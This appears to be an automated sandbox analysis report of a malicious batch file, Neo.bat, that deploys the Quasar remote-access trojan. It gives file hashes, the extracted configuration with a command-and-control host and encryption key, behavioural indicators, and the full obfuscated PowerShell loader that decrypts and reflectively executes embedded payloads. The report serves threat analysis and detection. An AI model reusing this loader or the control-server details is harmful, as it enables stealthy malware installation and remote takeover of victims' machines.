Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
29-06-2024 00:03
Static task
static1
Behavioral task
behavioral1
Sample
Neo.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Neo.bat
Resource
win10v2004-20240611-en
General
-
Target
Neo.bat
-
Size
272KB
-
MD5
c674b29c2da91c60f4221b2e87fe8c15
-
SHA1
3b79cb45ace0ddfedf1fa6f1b012321d830bf94f
-
SHA256
f8310b9b5ae9c3f90b01d84c8022b6fdd7bbd29ba56a600d948be6eff75d426f
-
SHA512
4f1c04ca8e4b0a2fd42a548245f49170ec65857098ac0f9bcebb96e10e19423f3a1c361c0ef0e5b9b1578d481342edcaca71c7a5846d1cd803db4868705dbb1b
-
SSDEEP
6144:PX3bTXRS0eSuT+pRHttyzLOh8cU/rzckvlfFPtoqNwRUo:fPBmSuWXtyziacUDzNfPtoUC
Malware Config
Extracted
quasar
1.1.0
Slave
runderscore00-42512.portmap.io:42512
QSR_MUTEX_aYgVTolyJfnSo2kPQj
-
encryption_key
PK7SpR1WESSqHBwmTfVi
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/3992-24-0x0000000007340000-0x000000000739E000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com 7 api.ipify.org -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 5092 3992 WerFault.exe powershell.exe 872 3992 WerFault.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3992 powershell.exe 3992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3992 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 3992 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2148 wrote to memory of 3992 2148 cmd.exe powershell.exe PID 2148 wrote to memory of 3992 2148 cmd.exe powershell.exe PID 2148 wrote to memory of 3992 2148 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Neo.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cQOtDanpy2r1fIq2RmiAP3pi2F+wAyCLQ56qZLg4djg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbayyMB6uwbPJLlahgTXHQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gWazs=New-Object System.IO.MemoryStream(,$param_var); $Cqmzr=New-Object System.IO.MemoryStream; $aiCtn=New-Object System.IO.Compression.GZipStream($gWazs, [IO.Compression.CompressionMode]::Decompress); $aiCtn.CopyTo($Cqmzr); $aiCtn.Dispose(); $gWazs.Dispose(); $Cqmzr.Dispose(); $Cqmzr.ToArray();}function execute_function($param_var,$param2_var){ $DGfYx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GbNUb=$DGfYx.EntryPoint; $GbNUb.Invoke($null, $param2_var);}$IuUoW = 'C:\Users\Admin\AppData\Local\Temp\Neo.bat';$host.UI.RawUI.WindowTitle = $IuUoW;$RQVpb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IuUoW).Split([Environment]::NewLine);foreach ($ykdlx in $RQVpb) { if ($ykdlx.StartsWith(':: ')) { $fedhE=$ykdlx.Substring(3); break; }}$payloads_var=[string[]]$fedhE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 27083⤵
- Program crash
PID:5092 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 27283⤵
- Program crash
PID:872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3992 -ip 39921⤵PID:1464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3992 -ip 39921⤵PID:984
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82